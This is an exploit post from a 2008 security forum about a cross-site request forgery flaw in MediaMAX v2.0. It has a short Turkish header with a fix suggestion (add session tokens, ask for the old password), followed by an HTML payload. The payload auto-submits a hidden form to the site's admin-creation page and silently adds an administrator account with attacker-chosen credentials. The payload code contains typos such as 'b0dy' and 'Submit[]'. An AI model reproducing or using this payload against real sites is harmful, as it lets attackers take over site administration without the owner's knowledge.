MediaMAX v2.0 ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > MediaMAX v2.0 ~ XSRF Vuln.

Madde
	Author : Bug Researchers
	Date : 14.11.2008 04:38:08
	# MediaMAX v2.0 ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : MediaMAX v2.0 # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers ############################################################# < ------------------- header data end of ------------------- > <b0dy onLoad=Submit();> <script>function Submit[]{document.BizaRRo.submit();}</script> <form action=http://www.site.com/administrator/admins_create.php method=post name=BizaRRo> <input type=hidden id=submitform name=submitform value=1 > <input id=username name=username value=bizo type=hidden/> <input id=password name=password value=bizo type=hidden/> <input id=email name=email value=bizo@bizo.com type=hidden/> <input type=submit value=create name=B1> < -- bug code end of -- >